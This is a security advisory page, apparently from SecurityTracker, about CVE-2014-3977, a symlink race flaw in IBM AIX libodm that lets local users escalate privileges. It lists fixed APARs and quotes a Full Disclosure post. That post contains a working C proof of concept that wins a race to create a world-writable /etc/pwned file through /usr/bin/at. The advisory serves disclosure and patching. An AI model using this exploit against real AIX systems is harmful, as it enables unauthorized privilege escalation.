Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   OS (UNIX)  >   IBM AIX Vendors:   IBM
IBM AIX libodm Symlink Flaw Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1030401
SecurityTracker URL:
CVE Reference:   CVE-2014-3977   (Links to External Site)
Date:  Jun 11 2014
Impact:   Modification of system information, Modification of user information, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 6.1.8 and later
Description:   A vulnerability was reported in IBM AIX. A local user can obtain elevated privileges on the target system.

A local user can exploit a symlink flaw in libodm to write to arbitrary files with elevated privileges.

The original advisory is available at:

Tim Brown from Portcullis Computer Security Ltd reported this vulnerability.

Impact:   A local user can obtain elevated privileges on the target system.
Solution:   The vendor has issued a fix.

6.1.7 IV60313
6.1.8 IV60311
6.1.9 IV60299
7.1.1 IV60312
7.1.2 IV60314
7.1.3 IV60303

The vendor's advisory is available at:

Vendor URL: (Links to External Site)
Cause:   Access control error

Message History:   None.

 Source Message Contents

Subject:  [FD] CVE-2014-3977 - Privilege Escalation in IBM AIX

Vulnerability title: Privilege Escalation in IBM AIX
CVE: CVE-2014-3977
Vendor: IBM
Product: AIX
Affected version: 6.1.8 and later
Fixed version: N/A
Reported by: Tim Brown


It has been identified that libodm allows privilege escalation via
arbitrary file writes with elevated privileges (utilising SetGID and
SetUID programs). The following will cause a new file /etc/pwned to be
created with permissions of rw-rw-rw:

#include <stdlib.h> #include <unistd.h> #include <stdio.h> int
pwnedflag; int main(int argc, char **argv) { pwnedflag = 0; umask(0); if
(fork()) { setenv("ODMERR", "1", 1); while (!pwnedflag) { if
(!access("/etc/pwned", F_OK)) { pwnedflag = 1; printf("Race
won...\r\n"); unsetenv("ODMERR"); exit(EXIT_SUCCESS); }
system("/usr/bin/at"); } } else { while (!pwnedflag) {
symlink("/etc/pwned", "ODMTRACE0"); if (!access("/etc/pwned", F_OK)) {
pwnedflag = 1; printf("Race won...\r\n"); exit(EXIT_SUCCESS); }
unlink("ODMTRACE0"); } } }

It is believed this is a side affect of CVE-2012-2179 being incorrectly
resolved. As understood, prior to CVE-2012-2179 being fixed, libodm
would simply open ODMTRACE0 and write to it assuming ODMERR=1. It is
believed that the fix that was applied was to check for the presence of
ODMTRACE0 and increment until no file was found. It is necessary to win
a time of check, time of use race condition by creating a symlink from
the ODMTRACE0 in the current working directory to the target file under
hoping that the link will be added after the check has been made that
ODMTRACE0 does not exist.

Further details at:

Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC